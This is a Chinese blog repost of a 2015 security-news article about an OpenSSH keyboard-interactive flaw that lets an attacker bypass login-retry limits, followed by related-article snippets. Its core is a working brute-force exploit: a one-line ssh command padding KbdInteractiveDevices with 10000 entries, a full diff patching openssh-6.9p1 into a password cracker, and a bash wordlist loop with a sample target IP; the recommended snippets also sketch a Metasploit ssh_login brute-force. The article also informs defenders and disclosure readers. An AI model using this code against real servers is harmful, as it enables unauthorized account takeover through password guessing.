OpenSSH漏洞可导致服务器被暴力破解 研究人员公布利用方法

最新推荐文章于 2024-05-02 11:25:32 发布
最新推荐文章于 2024-05-02 11:25:32 发布
阅读量243 收藏
点赞数
文章标签: 运维 shell
原文链接:https://yq.aliyun.com/articles/217878
版权

本文讲的是 OpenSSH漏洞可导致服务器被暴力破解 研究人员公布利用方法,利用安全远程访问工具OpenSSH中的一个漏洞,攻击者可绕过认证重试次数的限制,进行大量的口令猜解。一位网名为Kingcope的安全人员近日在博客上发布了这个漏洞的利用方法。

image

OpenSSH服务器的“键盘交互”认证是打开的,默认设置为允许6次认证尝试,客户端只允许3次,然后就会关闭与服务器的连接。然而,这个认证机制可以在单次连接中进行多次认证尝试。利用这个漏洞,攻击者能够在允许登录时间的2分钟内进行多次口令尝试,也就意味着成千上万次的暴力破解。

而且,即使在OpenSSH的配置中把口令认证设置成“no”并使用公共密钥认证也无法防止这种攻击。

漏洞利用方法:

ssh -lusername -oKbdInteractiveDevices=`perl -e ‘print “pam,” x 10000’` targethost

这条命令可以在登录时间尝试多达10000个口令。下面是openssh-6.9p1的攻击补丁,打上这个补丁之后即可执行远程破解:

—分割线–

diff openssh-6.9p1/sshconnect2.c openssh-6.9p1-modified/sshconnect2.c

83a84,85

> char password[1024];

>

510c512,517

< authctxt->success = 1; /* break out */

—

> printf(“==============================================\n”);

> printf(“*** SUCCESS **********************************\n”);

> printf(“*** PASSWORD: %s\n”, password);

> printf(“==============================================\n”);

> exit(0);

>

1376a1384,1385

> char *devicebuffer;

> int i;

1386a1396,1405

> devicebuffer = calloc(1, 200000);

> if (!devicebuffer) {

> fatal(“cannot allocate devicebuffer”);

> }

>

> for (i=0;i<200000-2;i+=2) {

> memcpy(devicebuffer + i, “p,”, 2);

> }

> devicebuffer[200000] = 0;

>

1393,1394c1412

< packet_put_cstring(options.kbd_interactive_devices ?

< options.kbd_interactive_devices : “”);

—

> packet_put_cstring(devicebuffer);

1408c1426

< char *name, *inst, *lang, *prompt, *response;

—

> char *name, *inst, *lang, *prompt;

1410c1428

< int echo = 0;

—

> char *pos;

1425a1444

>

1430a1450

>

1443,1449c1463,1469

< echo = packet_get_char();

<

< response = read_passphrase(prompt, echo ? RP_ECHO : 0);

<

< packet_put_cstring(response);

< explicit_bzero(response, strlen(response));

< free(response);

—

> packet_get_char();

> if (fgets(password, 1024, stdin) == NULL)

> exit(0);

> if ((pos=strchr(password, ‘\n’)) != NULL)

> *pos = ”;

> printf(“%s\n”, password);

> packet_put_cstring(password);

—分割线—

补丁打上之后,即可使用下面的shell脚本挂上词汇表进行口令破解的尝试:

—分割线—

#!/bin/bash

# run as:

# cat wordlist.txt | ./sshcracker.sh ssh-username ssh-target

#

while true

do

./ssh -l$1 $2

rc=$?; if [[ $rc == 0 ]]; then exit $rc; fi

echo Respawn due to login grace time…

done

—分割线—

例如:

cat wordlist.txt | ./sshcracker.sh test 192.168.2.173

该攻击已经在FreeBSD 10.1系统及老版本如6.2上成功测试。

原文发布时间为:七月 24, 2015
本文作者:Recco
本文来自云栖社区合作伙伴安全牛,了解相关信息可以关注安全牛。
原文链接:http://www.aqniu.com/threat-alert/8909.html

weixin_33754065
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现】OpenSSH ProxyCommand命令注入漏洞(CVE-2023-51385)
做自己喜欢的事,并将其发挥到极致!
12-27 4734
OpenSSH 是 SSH(Secure SHell)协议的免费开源实现。SSH协议族可以用来进行远程控制, 或在计算机之间传送文件。而实现此功能的传统方式,如telnet(终端仿真协议)、 rcp ftp、 rlogin、rsh都是极为不安全的,并且会使用明文传送密码。OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,并由此来代替原来的类似服务。一个存在于OpenSSH中的命令注入漏洞,攻击者可利用漏洞注入恶意Shell字符导致命令注入。
linux的低版本中openssh三大漏洞的分析及修复方法
主题模板站的博客
02-01 1337
参考网址* BUGTRAQ:20061005 rPSA-2006-0185-1 gnome-ssh-askpass openssh openssh-client openssh-参考网址* BUGTRAQ:20080325 rPSA-2008-0120-1 gnome-ssh-askpass openssh openssh-client openssh-下载的是源码包要编译一下,注意我的编译路径,我是讲OPENSSH安装在,原来的路径下,这样后面安装完成后。,可以根据实际情况定制安装路径。
OpenSSH客户端漏洞:CVE-2016-0777和CVE-2016-0778
核桃树
01-20 8205
from:http://bobao.360.cn/learning/detail/2566.html?utm_source=tuicool&utm_medium=referral from:https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt
一键解决80%的Linux系统高危漏洞软件-之openssh9.7最新(粉丝送福利)
最新发布
huiyangxu blog
05-02 1831
下面是我这一台Centos6.5的老版本操作系统,没有更新openssh之前的漏洞扫描信息,可以看得出来高风险全是openssh(本漏扫使用最新的规则库2024-04-04发布的)Linux系统默认的OPENSSH版本比较低,等保等安全检查时,一定会被扫出来高风险漏洞,而高风险是等保三的否决项,一定要解决。网上大部分的解决的办法就是源码编译安装openssh,编译的时间较长,也比较麻烦,小白的话很容易做错导致系统登录不进去了。更新openssh之后再漏扫检查,可以看出来,己经没有高风险漏洞了!
OpenSSH命令注入漏洞(CVE-2020-15778)
热门推荐
qq_42947816的博客
02-09 2万+
一般在特定环境下利用,比如在知道SSH账户密码后,但禁用SSH登陆或SSH连接被阻止,服务器允许使用scp传文件的情况下,可对其进行命令注入,所以如果攻击者不知道ssh账密,此漏洞无法利用
ssh爆破获取用户密码
qq_59423570的博客
08-23 3172
通过nmap扫描目标主机发现ssh版本为OpenSSH 5.3,有漏洞 漏洞影响版本(OpenSSH =< 8.3p1) 使用msfconsole 工具 search ssh #查找有关ssh的漏洞 找到并使用漏洞use auxiliary/scanner/ssh/ssh_login showoptions #查看此漏洞需要的配置信息 set RHOSTS #配置目标主机ip set USERNAME #设置用户...
centos7内网服务器离线升级到最新openssh-9.3p1版本,可解决openssh相关漏洞
05-19
可用于centos7内网服务器无法链接互联网的升级,可以解决OpenSSH权限提升漏洞(CVE-2021-41617)、OpenSSH 资源管理错误漏洞(CVE-2023-25136)等openssh相关漏洞; 执行命令:yum localinstall openssh-* -y 查看版本:...
Redhat6.5升级openSSH-8.7p1修补扫描openSSH漏洞.zip
09-26
在描述中提到的漏洞可能是由于旧版本的OpenSSH存在安全缺陷,可能导致恶意攻击者入侵系统,因此需要及时更新到最新版本。在这个案例中,我们需要将OpenSSH从旧版本升级到8.7p1,这是一个包含安全修复的更新版本。 ...
OpenEuler22.03 LTS 升级openssh9.6p1解决openssh中高危漏洞(亲测有效)
02-22
最近,OpenSSH曝出了一些高危漏洞,这些漏洞可能被恶意攻击者利用,对系统造成严重威胁。因此,升级OpenSSH至最新版本变得极为迫切。本文将详细介绍如何在OpenEuler 22.03 LTS上升级OpenSSH到9.6p1版本,以及这个...
openssh漏洞修复,openssh升级脚本一键升级8.9
06-23
然而,随着时间的推移,OpenSSH可能会出现漏洞,这些漏洞可能被恶意攻击者利用,对系统造成威胁。因此,及时修复和更新OpenSSH是必要的。 本文将详细讲解如何使用提供的"openssh漏洞修复,openssh升级脚本一键升级...
centos升级openssh脚本,一键修复openssh漏洞(openssh8.6p1)
10-19
升级到openssh8.6p1,openssl-1.1.1g,zlib-1.2.11 上传到centos目录,解压,进入openssh目录 直接bash update_openssh_8_6.sh 完成升级
OpenSSH 曝远程代码执行漏洞,尽快升级
Free雅轩的博客
03-20 2120
BSD、以及其它类Unix平台上SSH 2.0协议的完整支持,主要修复了上一个版本中发现的bug和安全问题。需注意的是,7.4版本的各项底层变化,有可能会影响现有的配置。OpenSSH 7.4已于2016年12月19日正式发布,新版本移植了在。据网络空间搜索引擎 ZoomEye 结果显示,黑客可通过漏洞执行远程代码,或导致数据泄露。OpenSSH 7.3 及以下版本。
OpenSSH ProxyCommand命令注入漏洞(CVE-2023-51385)
Flamingo1998的博客
12-27 2838
OpenSSH ProxyCommand命令注入漏洞(CVE-2023-51385)
CVE-2020-15778 OpenSSH命令注入漏洞
yyj1781572的博客
04-05 3160
scp是secure copy的缩写。在linux系统中,scp用于linux之间复制文件和目录,基于ssh登陆进行安全的远程文件拷贝命令。该命令由openssh的scp.c及其他相关代码实现,通过这次实验你将了解到通过scp进行反弹shell的操作。
利用Vulnhub复现漏洞 - OpenSSH 用户名枚举漏洞(CVE-2018-15473)
JiangBuLiu的博客
07-09 7833
OpenSSH 用户名枚举漏洞(CVE-2018-15473)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现CVE-2018-15473-Exploit Vulnhub官方复现教程 https://vulhub.org/#/environments/openssh/CVE-2018-15473/ 漏洞原理 OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用...
centos7.6云服务器安全高危漏洞Openssh
xrf_7520的博客
09-13 2769
Linux OpenSSH-9.0p1最新版升级步骤详细(附脚本)
OpenSSH命令注入漏洞复现(CVE-2020-15778)
weixin_44537595的博客
10-24 3011
OpenSSH命令注入漏洞复现 1、简介 OpenSSH 是 SSH (Secure SHell) 协议的免费开源实现,ssh主要就是用来远程控制计算机,或传输文件,OpenSSH是使用SSH透过计算机网络加密通讯的实现。 2、漏洞概述 该漏洞是存在于scp在拷贝文件时产生的一个代码注入漏洞,攻击者可以利用漏洞执行任意命令,比如:反弹shell, 3、影响版本 openssh <= openssh-8.3p1 4、实验环境 首先下载openssh,版本要符合漏洞影响的版本 服务端:apt-get
Openssh修复漏洞
临海的博客
11-08 1万+
Centos7的Openssh修复漏洞现象为:备用连接:执行脚本更新: 现象为: 由于openssh版本过低当用扫描软件检测时会出现以下漏洞: 判断为版本低,需要升级,如果是远程连接的话,可能会连接断开,考虑预案,除ssh连接之外,设置好telnet连接。 备用连接: 安装telnet工具,因为升级过程中怕失败或者重启ssh失败。我们直接yun安装即可。 安装telnet,以便连接 yum i...
升级OpenSSH到8.8p1版本解决漏洞扫描修复高危漏洞问题
XJKSY2003的博客
09-20 1658
或者可以添加一个可以登录的用户,登录并su到root用户(建议采用此方法,保证系统安全)。5、升级前需要开启telnet,防止升级失败,系统无法登录,对应的防火墙需要开启23端口,安装需要telnet相关包(推荐通过系统ISO安装)8、升级需要gcc、make、perl、zlib、zlib-devel、pam、pam-devel依赖包;PS:如果开启了防火墙,需要将23端口(系统默认23为telnet端口)添加到防火墙允许的端口的列表中。编辑/etc/pam.d/login,注释掉下面这行。
如何处理openssh服务器漏洞
05-26
如果您使用的是OpenSSH版本7.2p2或更早版本,则可能存在漏洞,因此建议升级OpenSSH服务器到最新版本来修复漏洞。...总之,升级OpenSSH服务器是修复漏洞最有效的方法,但是可以采取其他措施来增强服务器的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值